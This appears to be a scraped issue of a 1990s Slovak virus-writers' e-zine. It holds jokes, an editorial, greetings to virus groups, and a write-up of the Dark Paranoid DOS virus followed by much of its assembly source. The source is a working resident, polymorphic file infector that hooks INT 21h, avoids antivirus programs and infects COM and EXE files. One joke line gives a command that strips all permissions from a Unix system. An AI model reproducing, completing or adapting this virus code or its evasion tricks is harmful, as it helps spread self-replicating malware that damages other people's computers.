Embed Size (px)
Citation preview
Hardware-independent means it doesn't run on any computer.
This mail is delivered using 100% recyclable electrones.
Have you heard about new Microsoft's crystal ball?Anything you ask, it answers: "Not enought memory, add 20MB and try again"
If god wanted human to work with computers, he'd equipe them with fast I/O ports
Quadrature of a circle? Phew! Try to install Windows95!
Sex is 1 of 9 reasons for reincarnation; the other 8 are unimportant.
When the lights are out, all woman are beautiful.
Virginity can be cured.
Your Hard Disc is dead, but Eddie lives!
Wanna keep your system ABSOLUTELY secured? Use: su -c "chmod -R 000 /"
File not found - Should I fake it?
What is this red button fowr9Y~~m NO CARRIER
How to double your disk drive space: Delete Windows.
Avoid hangovers: Stay drunken.
/etc/passwd: no such file or directory
Microsoft: brings power of yesterday to computers of today.
Life could be much easier if we have its source code.
#define QUESTION (2B || !2B) // Shakespeare
This section is the finest spice which makes the mag much more tastier. Webring to you quality not the quantity. At least in this issue.
Dark Paranoid / Terror-6Kyjacisko / VyvojarOne_Half.3577 / VyvojarTMC:Level_6x9.A (Tiny Mutation Compiler) / EnderWordMacro.SlovakDictator / Nasty Lamer & Ugly Luser
From the top position of the Wild list comes famous One_Half.3577 by Vyvojar,one of the best ever written viruses. We also present unusual virus DarkParanoid by Terror-6, author with innovative ideas and very coolio style ofcoding. Ender, the TMC author didn't want to release full sources due his "love"to AVerz so we were at least allowed to publish description based on sourcecode analyse and some sample of second generation. Blesk expemimented inthe last time with the archive infection and we present the results of hisresearch. Two really "lame" macrovirus authors - The Nasty Lamer and TheUgly Luser - wrote for our mag two nice macroviruses. That would be nothingspecial but those macroviruses are top elite. They have variable length, they aretrue polymorphic and the only one exemplar is detected by f-win. This is quitfunny story. Some 10 dayz ago authors uploaded that one sample to cicatrix'ssite :)It is very crazy idea to detect this one macro by CRC (f-win suX) or am I notright dear Frisk???
.
At this time our Article section is only virus oriented (the rest of HPAV is omited right now), justbecause submissions we received are virus only. But in a future issues we promise to cover notonly viruses. However who knows :-) So enjoy these articles, hope they 'll brigh some interesting infoz to you - there's rather lot's ofstuff to read left, so go for 'em!
Stealth / mglDark Avenger - the legend / mglEnd of TBAV independence / mglCPU opcodes / mglRAR'n'ARJ dropper / bleskStory of one book / The Ziggy ZagDiary - Present future to forgotten past / The Unforgiven of ImmortalRiot/Genesis
In this issue we have 4 interwiews. I think it is rightenough for one isssue. But, actually we present in thisfirst issue only the VX side of the biz. We've selected4 interesting people, from 4 groups and two contiments.We hope, you'll enjoy all questions and answers. Stuffin brackets 're commnets by flush or mgl.
Interview with CoKe of VLADInterview with WildW0rker of RSAInterview with Sep of IRGInterview with MrSandman of 29A
.
o, everything ends sometimes or somewhere. And you have, unfortunately, reached the end of our firstissue. We hope, all you enjoyed the mag. To say the true, in some moments we lost hope the mag 'll besometimes released. First we had viewer but not enough articles, then we obain high quality articles butfound the viewer shitty... So we decided to use new mag engine, The CYBERAGE. After all the problems,the zine went out (uraaaaaaaaaaaaaaaaaaaaaaaaah!!!!). We know, our english is in some points quit buggy.We apologise :(((( But in the limited time we had for our work there was no oportunity to find someworkaround. On the other hand, we brought to you in this issue tasty and cheesy high quality viruses andsome other stuff. If you enjoyed the mag, please give us some form of feedback (look at "How to contact us"section). We need some moral support to keep us the engouraged for next issues. Do not forget, everyonehas a share, everyone can contribute.
flush + mgl
ear reader, please allow me to introduce the first (and i hope not the last at the same time) issue of ourzine. I hope, everyone 'll find in this isssue at least two or three articles, which 'll be for him of some value.
e would like to focus our mag not only on virii, but also on the rest of the H/P/A/V. Ofcourse, we don'twant to present only own stuff, every piece of your activity, dear reader, 'll be great. If you 're author of theultimate, kick-the-ass virus or utility, or just want to tell your latest experiences or opinions to the rest ofcomunnity, contact us ! We would like to make your stuff public.
emember, not everyone is virus&asm guru, so we 'll bring some stuff, which for some of you dudes, couldbe trivial or lame. But for someone it could be good example or ever the inspiration for own start as vx coder.
ast but not the least, we 'll try to bring some interesting background stories and infos, some virus historyrelated articles and more ...
hy this zine is named '*'? Well, we got several explanations. Just choose your favourite one.'*' in computer terms stands for wildcard - the sign that covers everything.'*', which ascii code is 42, was a international code for Slovakia, the origin of editors of this zine.However, nowadays we got a new dial-code 421 :('*', the number of 42, is the answer to ultimate question of life, universe and everything.
iz little section is very important. If we forget to include you name, don't worry about it. We apologise forsuch a ommision, but on the other hand, who cares?
Personal greetings Virus section
Sep-IRG - if we meet personally, we 'll land in next pub
TuIRG - thanx for your great contribution
QuantumG - your Unix page is gr8t
Ww0rker - how do you feel as fresh married ? :-P
Mr.Sandman - 29A - isn't it MiG some fighter ?
l- - can i get some nukes ? And how was the stay on Hawai ?
Dark Avenger - long live the legend !
lovinGOD - it's really hard to meet you on #virus
Dark Angel - was nice to meet you
yurik - nu, neudalos, poprobuem esco odin razik
Tornado - are you alive ?
avd - TMC is really kick the ass virus
Ender - awainting for your next virus
Online - yu'v kewl style of coding
Nasty Lamer &Ugly Luser
- you kicked the fwin's ass :))))
_COKe_ - keep da VLAD alive !!! Und zum Wohl !
Vyvojar - how did you find us ???
Blesk - sorry for the viewer. But thiz1 is1ly real the best from all 'round the
worldkdkd - 777 !
qark - thanx for sending me VLAD in the past
rebyc - hope my mail 'll reach yer mbox. And be ready for the anti M$ stuff
Dark Paranoid
This is another elite contribution to our zine. So, after some time passed from release of thisbeautifull piece of code, we can present it to the virus comunity. I would like to express myunlimited thanx for allowing me to publish the source code to the author. Coder of DarkParanoid, known under handle Terror-6, is one of the young Slovak programmers, who arecountinuing the work of Vyvojar - to bring to the world new, never before seen viruses of thefinest slovak quality. So far, according available information, Terror-6 is working onsomething, but no one knows, what it is. But we can hope, it will be some wild thing.
And now, let's talk about Dark Paranoid. This is very unusual com'n'exe com'n'exe fileinfecting resident virus. The approximate lenght of code, which is appended to target file isabout 6 kB. When infecting com files, the Dark Paranoid 'll place own code to the start of fileand the original contens of file 'll be moved behind the viral body. Exe's are infected as usual,the virus is appended to the end of file and the header 'll be manipulated to point to the virus.But what makes Dark Paranoid so unusual is its polymorphism. This virus is polymorphiceven in the memory. In every moment, only one instruction from virus is unencrypted. Afterexecution of this instruction occurs INT 1. Handler of INT 1 'll reencrypt executed instructionand decrypt next one. Decrypted instruciton 'll be execuded and excrypted again. And this isthe princip of Dark Paranoid's "ENGINE OF ETERNAL ENCRYPTION". If you think, that INT1 handler could be used as possible scanstring, you are so hopeless and crap ...
When author spended such a amout of time and beer to code such a beutifull virus, and thenhe allow to catch it in memory with simple scanstring, he 'd be a big jerk. So, dear Averz anddear virus friends, handler is slightly polymorphic. On every instalation to the memory is thishandler changed.
Virus avoids to infect files, which starts wiht 'AV', 'SC,' 'CL', 'GU', 'NO', 'FV', 'TO', 'TB'. In plaintext, Dark Paranoid 'll not infect AVP, SCAN, CLEAN, GUARD, NOD (but ICE 'll be infected:(((( ), FINDVIRUS, TOOLKIT and TBAV. Dark Paranoid 'll also avoid to infect baits andgoats.
.
Dark Paranoid contains payload - it prints on the screen text Dark Paranoid and shakes thescreen.
Finally, all I have to say is - enjoy the code.
Download here
DARKPARA.ASM
; compile to COM then run it.
.MODEL tiny
.CODE
.186
begin :org 100h
virlen equ ( offset endv - offset begin )heaplen equ ( offset heapend - offset heapbeg )datalen equ ( offset dataend - offset heapbeg )len_range equ 1001d_len equ offset d_end - offset d_begactionc equ 4096MAXinst equ 8b_d equ 40hlen equ virlen +heaplenWRITE_LEN equ virlen +datalenwrite_len_exe equ virlen +( offset data_12e - offset heapbeg )com_len equ write_len - 100hREQUEST_MEM equ ( len )/ 16+1C_head equ offset C_aft - offset startss_distance equ 512MAXCOM equ 65535gb_len equ offset gb_end - offset gb_memHEADERLEN equ 20hdecr_code equ offset gb_mem- offset startvSP equ 200hSS_to_CS equ ( write_len_exe +len_range )/ 16+1TF equ 300h
start :old_enable :ENABLE:
push dspush di
push 0popf
xor di , dimov ds , di
e1: mov di , cs :[ engine__ ]xchg word ptr ds :[ 01* 4], di
e2: mov word ptr cs :[ old1 ], dimov di , csxchg word ptr ds :[ 01* 4+2], di
e3: mov word ptr cs :[ old1 +2], di
pop dipop ds
push TFpush cs
ent_ :push offset start_v
eA: mov cs :[ oldptr ], offset rcptiret
old_engine :
DARKPARA.ASM
ENGINE: pushamov bp, sppush dspush cspop ds
e5: mov si , cs :[ oldptr ]ec_oldx : nopeng2 : mov si ,[ bp+16]dc_oldx : nope6: mov word ptr cs :[ oldptr ], si
pop dspopa
eng_iret : iret
old_disable :DISABLE: push ds
push dixor di , di
mov ds , die8:
mov di ,word ptr cs :[ old1 ]mov ds :[ 4], dimov di ,word ptr cs :[ old1 +2]mov ds :[ 6], di
pop dipop ds
Iretorg 300h
C_aft :gb_mem:old1 dd ?engine__ dw offset ENGINEoldptr dw ?k1 dw ?k2 dw ?k3 dw ?gb_end :
org 400h
pred db MAXinst dup (?)start_v : nop
push es
push cspop ds
jmp IDENTIFY
action :mov ax , 0b800hmov ds , axmov si , 160* 12+60mov byte ptr [ si ], 'D'mov byte ptr [ si +2], 'a'mov byte ptr [ si +4], 'R'mov byte ptr [ si +6], 'K'mov byte ptr [ si +8], ' 'mov byte ptr [ si +10], 'P'mov byte ptr [ si +12], 'A'mov byte ptr [ si +14], 'R'
DARKPARA.ASM
mov byte ptr [ si +16], 'a'mov byte ptr [ si +18], 'N'mov byte ptr [ si +20], 'O'mov byte ptr [ si +22], 'i'mov byte ptr [ si +24], 'D'
xor cx , cx
ddd : push cx
mov ax , 3call randommov ah, 80mul ahmov bl , almov ax , 5call randomadd al , 80- 2add al , blmov ah, almov al , 0dh
mov dx , 3d4hout dx , alxchg al , ahinc dxout dx , al
mov dl , 0b4hxchg ah, alout dx , alinc dxxchg ah, alout dx , al
mov dx , 61hand al , 002hor al , 30hout dx , al
pop cxdec cxjnz ddd
retn
ALLOC:mov ah, 50hmov bx , 8int 21hnopmov ah, 48hmov bx , REQUEST_MEMint 21hnoppushfpush axmov bx , esmov ah, 50hint 21hnop
DARKPARA.ASM
pop axpopfretn
ACCESS: mov ax , 5800hint 21hnopmov [ UMB_strategy ], axmov ax , 5802hint 21hnopmov ah, 0mov [ UMB_link ], axmov ax , 5801hmov bx , 0041h ; umb - best fitint 21hnopmov ax , 5803hmov bx , 1int 21hnopretn
UNACCESS: push axmov bx ,[ UMB_link ]mov ax , 5803h ; restore chainint 21hnopmov ax , 5801h ; restore strategymov bx ,[ UMB_strategy ]int 21hnoppop axretn
gen_preint : mov ax , 6call randomadd al , 0f8hmov byte ptr [ INT_21 ], alretn
IDENTIFY :mov ah, 2ahint 21hnopcall cr_dataadd cx , dxmov dx , cs
INSTALL_TO_MEM: call ACCESScall ALLOCpushfcall UNACCESSpopfjnc mem_ok
LOW_INSTALL:mov ax , 4a00h +'¨'mov bx ,- 1int 21hnopmov ah, 4ahsub bx , REQUEST_MEM+1int 21hnop
DARKPARA.ASM
call ALLOCjnc mem_okpush espop dsint 20hnop
mem_ok:mov es , ax
COPY: cldpush cspop dsxor si , sixor di , dimov cx , write_len / 2+1
rep movsw
HIGHz: push espop ds
rl2 :mov ax , offset temp_int_21mov di ,word ptr [ ent__ ]mov [ di ], ax ; entry point
call init_randomGET_VECTORZ: push 0
pop dsmov ax , ds :[ 4* 21h ]mov bx , ds :[ 4* 21h+2]mov word ptr es :[ old_21 ], axmov word ptr es :[ old_21 +2], bx
mov ax , cs :[ bitch ]mov word ptr ds :[ 4* 21h ], axmov word ptr ds :[ 4* 21h+2], es
mov byte ptr es :[ TEMP_INT_21], 90h
mov es , dxpush cspop ds
call gen_preint
mov ah, 4ch ; don't think it ends so soon.int 21h ; so much things to do.
TEMP_INT_21: nopadd sp , 6
push dspush cspop dsmov di ,[ old1_ofs ]mov ax ,word ptr es :[ di ]mov word ptr ds :[ di ], axmov ax ,word ptr es :[ di +2]mov word ptr ds :[ di +2], ax
MAKE_HEAP: xor ax , ax
DARKPARA.ASM
mov [ create ], ax
mov ax , offset int_21mov di ,word ptr [ ent__ ]mov [ di ], ax
push espushacall morphpush 0pop dsmov ax , cs :[ bitch ]mov word ptr ds :[ 4* 21h ], ax
popapop es ds
RETURN: mov ax , sscmp ax , dxje COM_RETURN
EXE_RETURN: pop esmov cx , esadd cx , 10h
mov bx ,[ old_ss ]add bx , cx
add [ old_cs ], cx
mov ax ,[ old_sp ]sub ax , sp
mov ss , bxadd sp , ax
push 200hpush word ptr [ old_cs ]push word ptr [ old_ip ]
call entry_regsjmp take_off_2
entry_regs : xor si , sixor di , dixor ax , axxor bx , bxxor cx , cxxor dx , dxpush espop dsretn
COM_RETURN:mov cx ,[ block_len ]mov si ,[ block_beg ]mov di , 100hadd si , dicldrep movsb
DARKPARA.ASM
pop escall entry_regs
push 200hpush espush 100hjmp take_off_2
TAKE_OFF_2: pushapush ds
push cspop dsmov al ,byte ptr [ dis_val ]mov byte ptr [ rcpt ], al
pop dspopa
push cs :[ disable__ ]push 0push cspush offset rcptiret
ena_pop :
int_21 : nopcmp ah, 5bh ; create new fileje crtcmp ah, 3chjne v001
crt : cmp cs :[ create ], 0jne jincall executable
jin : jnz JUMP_INT21cr_co : call hookold
INT 21h ; come get somepush dspush cspop dsjc donemov [ create ], ax
done : call rehookpush simov si , sppush sspop dspush axlahfmov [ si +8], ahpop axpop sipop dsjmp take_off_2
v001 : cmp ax , 6c00hjne v002cmp dl , 10hje ok6ccmp dl , 12hjne JUMP_INT21
DARKPARA.ASM
ok6c : cmp cs :[ create ], 0jne JUMP_INT21xchg si , dxcall executablexchg si , dxjnz JUMP_INT21test bl , 2jnz cr_copush ax cxpush bxand bl , 0fchinc blinc blcall hookoldINT 21hnopcall rehookpop bxjnc cr_2pop cx axjmp JUMP_INT21
cr_2 : add sp , 4push dspush cspop dsmov [ create ], axjmp done
v002 : cmp ah, 3ehjne v003cmp cs :[ create ], bxjne v003jmp INFECT_
v003 : cmp ax , 5800hje ID_OK
JUMP_INT21: push 0push word ptr cs :[ old_21 +2]push word ptr cs :[ old_21 ]jmp TAKE_OFF_2
hookold : push ax ds espush 0pop dspush cspop esmov ax ,word ptr cs :[ old_21 ]xchg ax , ds :[ 21h* 4]mov es :[ hook21 ], axmov ax ,word ptr cs :[ old_21 +2]xchg ax , ds :[ 21h* 4+2]mov es :[ hook21 +2], axpop es ds axretn
rehook : push ax dspush 0pop dsmov ax , cs :[ hook21 ]
DARKPARA.ASM
mov ds :[ 21h* 4], axmov ax , cs :[ hook21 +2]mov ds :[ 21h* 4+2], axpop ds axretn
X_21: push ax dspush cspop ds
mov ax ,word ptr [ safe ]mov word ptr [ rcpt ], axmov al ,[ safe +2]mov byte ptr [ rcpt +2], alpop ds axjmp rcpt
ID_OK:push axpush dx cxcall hookoldmov ah, 2ahint 21hnopcall rehookmov ax , cxadd ax , dxpop cx dxcmp ax , cxpop axjne JUMP_INT21add sp , 8jmp return
EXECUTABLE: pushacldmov si , dxmov bx , dx
i002 : lodsbcmp al , '\'je yepacmp al , ':'jne nopa
yepa : mov bx , sinopa : or al , al
jnz i002mov ax ,[ bx ]mov bl ,[ bx +2]and ax , 0dfdfhand bl , 0dfhcmp ax , 'VA' ; AV[*]je ex_2cmp ax , 'CS' ; SCANje ex_2cmp ax , 'LC' ; CLEANje ex_2cmp ax , 'UG' ; GUARD (of eden ? )je ex_2cmp ax , 'ON' ; NOD ?je ex_2cmp ax , 'VF' ; ???
DARKPARA.ASM
je ex_2cmp ax , 'OT' ; toolkitje ex_2cmp ax , 'BT' ; tbavje ex_2
inc alcmp al , 'Z' +1jne sksmmov al , 'A'
sksm:cmp al , ahjne namvspbinc ahcmp ah, 'Z' +1jne skasmmov ah, 'A'
skasm:cmp bl , ahje ex_2
namvspb :mov ax ,[ si - 3]mov bl ,[ si - 4]or ax , 2020hor bl , 20hcmp ax , 'ex'jne i003cmp bl , 'e'je ex_en
i003 : cmp ax , 'mo'jne ex_en
ex_2 : cmp bl , 'c'ex_en : popa
retn
I_ERROR: jmp i_ecINFECT_:
pushapush dspush escall hookoldpush cspop espush cspop ds
i001 :TIMESTAMP: mov ax , 5700h
INT 21Hnopmov al , cland al , 1fhdec aljnz ts_1jmp BAD_TIME
ts_1 : push cspop dsmov [ time ], cxmov [ date ], dx
READ_BUFFER: call seekstart
mov dx , offset buffermov cx , HEADERLEN
DARKPARA.ASM
mov ah, 3fhINT 21hnopjc i_errorcmp ax , cxjne i_errorcall random0mov byte ptr [ int_21 ], al
mov ax , len_rangecall randommov [ len_add ], axmov ax , actionccall randomcmp ax , 111hjne noactpushapush dscall actionpop dspopa
noact :
mov ax ,word ptr [ buffer ]cmp ax , 'MZ'je E_I_2cmp ax , 'ZM'jne COM_INFECT
e_i_2 : jmp EXE_INFECTisi : push si
add [ disable__ ], axadd [ ent__ ], axadd [ dc_old ], axadd [ dco_end ], axadd [ bitch ], ax
mov si ,[ __old_1 ]add [ si +4], ax
pop siretn
cni : jmp CAN_NOT_INFECT
COM_INFECT: call seekend
or dx , dxjnz CNIcmp ax , maxCOM- COM_Lenja CNImov [ block_beg ], ax
call seekstart
push bxcall ACCESSmov ah, 48hmov bx ,( COM_len+d_len +1+len_range )/ 16INT 21hpop bxjnc canaljmp CAN_NOT_ALLOCATE
DARKPARA.ASM
canal :mov cx , COM_lenadd cx ,[ len_add ]mov [ temp_seg ], axmov ds , axxor dx , dxmov ah, 3fhINT 21hnoppush cspop dsmov [ block_len ], axpush ax
call seekstart
mov si ,[ ent__ ]push [ si ]mov word ptr [ si ], offset start_v
mov dx ,[ bitch ]mov ax , 100hsub ax , dxpush axcall isi
mov cx , C_headmov ah, 40hcall x_21
mov dx , offset C_aftmov cx , COM_lenadd cx ,[ len_add ]
cmp [ block_beg ], cxjae long_cmov [ block_beg ], cx
long_c :sub cx ,[ len_add ]sub cx , d_len +C_headmov ah, 40hcall cr_datacall x_21call cr_dataadd [ len_add ], d_lencall write_add
pop axneg axcall isi
pop [ si ]call seekendpop cxxor dx , dxmov ds ,[ temp_seg ]mov ah, 40hINT 21hnop
push dspop es
DARKPARA.ASM
mov ah, 49hINT 21hnop
push cspop dspush cspop es
CAN_NOT_ALLOCATE:call UNACCESS
CAN_NOT_INFECT:mov cx ,[ time ]mov dx ,[ date ]mov ax , 5701hand cl , 0e0hor cl , alINT 21hnop
BAD_TIME:i_ec : mov [ create ], 0
call rehookcall gen_preintpop espop dspopajmp JUMP_INT21 ; close
Exe_Header STRUCEH_Signature dw ? ; Set to 'MZ' or 'ZM' for .exe filesEH_Modulo dw ? ; remainder of file size/512EH_Size dw ? ; file size/512EH_Reloc dw ? ; Number of relocation itemsEH_Size_Header dw ? ; Size of header in paragraphsEH_Min_Mem dw ? ; Minimum paragraphs needed by fileEH_Max_Mem dw ? ; Maximum paragraphs needed by fileEH_SS dw ? ; Stack segment displacementEH_SP dw ? ; Stack PointerEH_Checksum dw ? ; Checksum, not usedEH_IP dw ? ; Instruction Pointer of Exe fileEH_CS dw ? ; Code segment displacement of .exeeh_1st_reloc dw ? ; first relocation itemeh_ovl dw ? ; overlay numberExe_Header ENDS
EXE_INFECT: push cspop esmov si , offset buffer +EH_SScmp byte ptr [ si +18h - EH_SS], 40hje i_eccmp word ptr [ si +eh_ovl - EH_SS], 0 ; no evrs.jne i_eccmp byte ptr [ si +eh_max_mem- EH_SS+1], 7jbe i_ecmov di , offset old_SScldmovswmovswlodsw ; skip checksummovswmovsw
DARKPARA.ASM
call seekendSET_EXE_HEAD: push ax dx
mov cx , 200hdiv cxdec axcmp word ptr [ buffer +EH_size ], axpop dx axjb i_ec
EI03 : push ax dxand al , 0fhjz no_addmov cx , 10hsub cl , almov ax , 0b000hcall randomxchg dx , axmov ah, 40hINT 21hnoppop dx axadd ax , cxadc dx , 0jmp short yes_add
no_add : pop dx axyes_add : push ax dx
mov cx , 16div cxmov dx ,[ bitch ]mov word ptr [ buffer +EH_IP], dxsub ax ,word ptr [ buffer +EH_Size_Header ]mov word ptr [ buffer +EH_CS], ax
add ax , SS_to_CSmov word ptr [ buffer +EH_SS], axmov ax , 900hcall randomadd ah, 2mov al , 0mov word ptr [ buffer +EH_SP], ax
pop dx ax
add ax ,[ len_add ]adc dx , 0add ax , write_len_exeadc dx , 0mov cx , 200hdiv cxmov word ptr [ buffer +EH_Modulo ], dxor dx , dxjz EI01inc ax
EI01 : mov word ptr [ buffer +EH_Size ], axmov si ,[ ent__ ]push [ si ]mov word ptr [ si ], offset start_v
xor dx , dxmov cx , write_len_exemov ah, 40h
DARKPARA.ASM
call cr_datacall x_21call cr_datapop [ si ]
call write_add
jnc EI02jmp CAN_NOT_INFECT
EI02 :call seekstart
mov dx , offset buffermov cx , headerlenmov ah, 40hINT 21hnop
jmp CAN_NOT_INFECTseekend : mov ax , 4202hse_c : xor cx , cx
xor dx , dxINT 21hretn
seekstart : mov ax , 4200hjmp short se_c
fake_seg : mov ax , 0fa00hcall randommov ds , axmov al ,byte ptr ds :[ 0]cmp al ,byte ptr ds :[ 1]je fake_segmov al ,byte ptr ds :[ len_range - 6]cmp al ,byte ptr ds :[ len_range - 8]je fake_segretn
write_add : call fake_segmov cx , cs :[ len_add ]xor dx , dxmov ah, 40hINT 21hnoppush cspop dsretnretn
cr_ax equ offset cr_block +2
cr_randomize :mov di , offset cr_axmov cx , 6
cr_lop :movswscaswscasbmovswscaswscasb
DARKPARA.ASM
dec cxjnz cr_lopretn
cr_data : push simov si , offset heapbeg
xorsi macro numdb 81h , 74h ,& num, 0, 0endm
cr_block :db 81h , 34h , 0, 0xorsi 2 ; ????xorsi 4xorsi 6xorsi 8xorsi 10
xorsi 12xorsi 14xorsi 16xorsi 18xorsi 20xorsi 22
pop siretn
dil_ck : stoswxchg ax , bxstoswxchg ax , cxstoswxchg ax , dxstoswxchg ax , sistoswretn
dil_gen : mov di , offset getlostmov ax , 08b2ehmov bx , 0026h +256*( 255 and ( offset sp_tmp - offset begin ))mov cx , 0bf00h +( offset sp_tmp - offset begin ) shr 8mov dx , offset rcptmov si , 0f78bhcall dil_ckmov ax , 0df8bhmov bx , 04c6hmov cx , 0ffc3hmov dx , 0016h +256*( 255 and ( offset ec_new - offset begin ))mov si , 8a00h +( offset ec_new - offset begin ) shr 8call dil_ckmov ax , 0a204hmov bx , offset dis_valmov cx , 05c7hmov dx , 21cdhmov si , 45c6hcall dil_ckmov ax , 0c302hmov bx , 16ffhmov cx , offset ec_new
DARKPARA.ASM
mov dx , 368bhmov si , offset ecn_endcall dil_ckmov ax , 048fhmov bx , 00beh +256*( 255 and ( offset new_enable - offset begin ))mov cx , 8b00h +( offset new_enable - offset begin ) shr 8mov dx , 0003eh +256*( 255 and ( offset bitch - offset begin ))mov si , 0b900h +( offset bitch - offset begin ) shr 8call dil_ckmov ax , decr_code / 2mov bx , 0a5f3hmov cx , 0c033hmov dx , 0c08ehmov si , 368bhcall dil_ckmov ax , offset m1mov bx , 8926hmov cx , 0436hmov dx , 8b00hmov si , 00036h +256*( 255 and ( offset __old_1 - offset begin ))call dil_ckmov ax , 0c700h +( offset __old_1 - offset begin ) shr 8mov bx , 0644hmov cx , offset predmov dx , 00068h +256*( 255 and TF)mov si , 0e00h +( TF) shr 8call dil_ckmov ax , 00068h +256*( 255 and ( offset getlost_po - offset begin ))mov bx , 02e00h +( offset getlost_po - offset begin ) shr 8mov cx , 36ffhmov dx , offset m1mov si , 0c6c3hcall dil_ckmov ax , 0c304hmov bx , 0c726hmov cx , 0406hmov dx , 0000h +256*( 255 and ( offset reCrypt - offset begin ))mov si , 0c700h +( offset reCrypt - offset begin ) shr 8call dil_ckmov ax , 0006h +256*( 255 and ( offset oldptr_2 - offset begin ))mov bx ,( offset oldptr_2 - offset begin ) shr 8+256*( 255 and ( offset pred +1- offset begin
))mov cx , 05500h +( offset pred +1- offset begin ) shr 8mov dx , 0ec8bhmov si , 1f0ehcall dil_ckmov ax , 070eh
mov bx , 368bhmov cx , offset oldptr_2mov dx , 0fe8bhmov si , 0de8bhcall dil_ckmov ax , 16ffhmov bx , offset ec_newmov cx , 0fe81hmov dx , offset END_offsetmov si , 0372hcall dil_ckmov ax , 07be9hmov bx , 2bffhmov cx , 0276hmov dx , 0def7h
DARKPARA.ASM
mov si , 0ce8bhcall dil_ckmov ax , 0e981hmov bx , 0008hmov cx , 0d9f7hmov dx , 0c681hmov si , offset rcptcall dil_ckmov ax , 7e8bhmov bx , 0f302hmov cx , 8ba4hmov dx , 0276hmov si , 000bfh +256*( 255 and ( offset rcpt - offset begin ))call dil_ckmov ax , 0a500h +( offset rcpt - offset begin ) shr 8mov bx , 0a5a5hmov cx , 8ba5hmov dx , 0276hmov si , 0fe8bhcall dil_ckmov ax , 0de8bhmov bx , 16ffhmov cx , offset dc_oldmov dx , 3689hmov si , offset oldptr_2call dil_ckmov ax , 048bhmov bx , 0cd3chmov cx , 3a74hmov dx , 0f3chmov si , 3774hcall dil_ckmov ax , 703chmov bx , 0472hmov cx , 7f3chmov dx , 2f76hmov si , 08e3dhcall dil_ckmov ax , 74d3hmov bx , 3c28hmov cx , 7461hmov dx , 3d27hmov si , 0f1f7hcall dil_ckmov ax , 2174hmov bx , 0c33chmov cx , 1e74hmov dx , 0ee3chmov si , 1a74hcall dil_ckmov ax , 0cf3chmov bx , 1574hmov cx , 0eb3chmov dx , 1174hmov si , 0e83chcall dil_ckmov ax , 0c74hmov bx , 0e93chmov cx , 0874hmov dx , 0ff3dhmov si , 74d0hcall dil_ck
DARKPARA.ASM
mov ax , 0eb04hmov bx , 460ahmov cx , 4646hmov dx , 8946hmov si , 0276hcall dil_ckmov ax , 073e9hmov bx , 33ffhmov cx , 033f6hmov dx , 033ffhmov si , 0a1dbhcall dil_ckmov ax , offset empty_segmov bx , 0d88ehmov cx , 0c08ehmov dx , 0c033hmov si , 0cf5dhjmp dil_ck
POWERUP: push cspop escldcall fake_segxor si , simov di , offset new_enablemov cx , decr_code / 2rep movswpush cspop ds
mov [ __entry ], offset int_21
mov ax , 101hcall randommov [ bitch ], axadd ax , offset old_enable - offset new_enable - 100hmov [ b2], ax
call random_g_memmov [ __old_1 ], axadd ax , 4mov [ __engine ], axadd ax , 2mov [ __oldptr ], axadd ax , 2mov [ __ks ], axmov di , offset new_enablecall gen_enable
mov ax , b_dcall randomadd di , ax
mov [ m1], dimov ax ,[ b2]add [ m1], ax
call gen_enginepush cspop ds
DARKPARA.ASM
mov ax , b_dcall randomadd di , ax
mov ax ,[ b2]mov [ disable__ ], diadd [ disable__ ], axcall gen_disableretn
decision : push axmov ax , 2call randompop axretn
random0 : call randommov ax , cs :[ rseed ]retn
init_random :pushapush ds
xor ax , axmov ds , axxor ax , ds :[ 046ch ]
xor ax , ds :[ 3456h ]xor ax , ds :[ 7354h ]pop dsmov word ptr [ rseed ], axmov ah, 2ahint 21hnopxor dx , ds :[ 046eh ]xor dx , ds :[ 8* 4+2]xor dx , ds :[ 2354h ]mov word ptr [ rseed +2], axpoparetn
random : push dspush cspop dsmov word ptr [ rtemp ], ax
push bx cx dxmov ax ,word ptr [ rseed ]mov bx ,word ptr [ rseed +2]
mov cx , axmov dx , 8405h
mul dxshl cx , 3add ch , cladd dx , cxadd dx , bx
shl bx , 2add dx , bxadd dh, blshl bx , 5add dh, bladd ax , 1
DARKPARA.ASM
adc dx , 0mov word ptr [ rseed ], axmov word ptr [ rseed +2], dx
mov cx , dxmul word ptr [ rtemp ]
mov ax , cxmov cx , dx
mul word ptr [ rtemp ]xchg ax , dx
add dx , cxadc ax , 0pop dx cx bx ds
or ax , axretn
CSs equ 0EhDSs equ 1EhESs equ 06hSSs equ 16ht_mem equ 0t_const equ 1t_reg equ 2t_stack equ 3t_seg equ 4random_grow equ 3MK equ 0cccch
mc_const strucmcc_type db ?
db ?mcc_val dw ?mc_const ends
mc_memstrucmcm_type db ?mcm_seg db ?mcm_ofs dw ?mc_memendsGET_TAB: push dx
mov al ,[ si ]mov dl , 5mul dladd al ,[ si +4]shl ax , 2add ax , offset cross_tabcall axor ax , axpop dxretn
COMPILER:comp_l :
call GET_TABje co_badpush sicall axpop si
mov ax ,[ si +4]cmp al , t_regjne cllcmp ah,[ indy ]jne cll
DARKPARA.ASM
dec [ lock_ind ]cll :
co_ok : add si , 8cmp byte ptr [ si ], 0ffhjne comp_lretn
co_bad : mov al , 90hstosbjmp co_ok
RECURSER: mov [ si ], axmov [ si +2], bxmov [ si +4], cxmov [ si +6], dxcall ROOPadd si , 8retn
ROOP: call GET_TABjz must_gomov ax , random_growcall randomjnz roop_end
must_go : mov ax ,[ si +4]mov [ si +8+4], axmov ax ,[ si +6]mov [ si +8+6], ax
ro_l : mov ax , 4call randommov [ si +4], alcmp al , t_regjne ro_lzcmp [ lock_reg ], 0je ro_l
ro_lz : cmp al , t_stackjne ro_lxcmp word ptr [ si ], t_reg +4* 256je ro_l
ro_lx : call GET_TABjz ro_lmov al ,[ si +4]cmp al , t_memje garbage_memcmp al , t_regje garbage_reg
garbage_ret : mov [ si +4], ax ; destinationmov [ si +6], bxmov [ si +8], axmov [ si +10], bxadd si , 8jmp ROOP
roop_end : retngarbage_reg : mov ah,[ use_reg ]
jmp garbage_retgarbage_mem :
call random_g_memmov bx ,[ __old_1 ]dec bxsub bx , axja gm_okadd bx , 9
DARKPARA.ASM
jns garbage_memgm_ok: xchg ax , bx
mov ax , CSs* 256+t_memjmp garbage_ret
